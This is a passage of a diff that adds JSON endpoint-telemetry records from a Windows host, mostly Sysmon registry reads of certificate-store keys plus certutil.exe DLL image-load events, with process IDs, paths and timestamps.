"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "cryptsp.dll", + "image_path": "C:\\Windows\\System32\\cryptsp.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "ncrypt.dll", + "image_path": "C:\\Windows\\System32\\ncrypt.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "netapi32.dll", + "image_path": "C:\\Windows\\System32\\netapi32.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\System32\\bcrypt.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573497140000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + 
}, + { + "event_type": "image_load", + "image_name": "ntasn1.dll", + "image_path": "C:\\Windows\\System32\\ntasn1.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573497140000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "certcli.dll", + "image_path": "C:\\Windows\\System32\\certcli.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496670000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software 
Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + 
"registry_value": "CTLs", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497300000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "Wldap32.dll", + "image_path": "C:\\Windows\\System32\\Wldap32.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496670000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497450016, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", 
+ "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 